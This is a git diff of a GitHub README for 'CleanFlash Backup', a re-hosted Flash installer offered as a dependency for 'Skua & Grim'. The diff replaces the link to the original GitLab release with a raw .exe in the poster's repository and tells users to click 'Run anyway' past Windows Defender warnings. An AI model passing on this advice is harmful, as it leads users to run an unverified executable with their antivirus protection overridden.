wtffidy/CleanFlashBackUp/README.md

 # CleanFlash Backup

-This repository contains the CleanFlash Backup, a required dependency for [Your Program Name].
-The backup ensures smooth installation and operation of the program.
+This repository contains the a [Older] restored ersion of CleanFlash, a required dependency for Skua & Grim.

 ## Installation

 To install the CleanFlash Backup, follow these steps:

-1. Download the backup file from the [original source](https://gitlab.com/cleanflash/installer/-/releases).
+1. Download the backup file from [Release](https://github.com/wtffidy/CleanFlashBackUp/raw/main/CleanFlash_34.0.0.175_Installer.exe)

 2. When downloading, Windows Defender might prompt a security warning.

+3. when going through the installation, FOLLOW THE [GIF](https://imgur.com/ztsLYZ1) EXACTLY.

 ## Troubleshooting

 - If Windows Defender prompts you with a security warning:
   1. Click on "Show more" to reveal additional options.
-  2. Select "Run anyway" to proceed with downloading the CleanFlash Backup file.
+  2. Select "Run anyway" to proceed with Installing CleanFlash.

 ## Contributing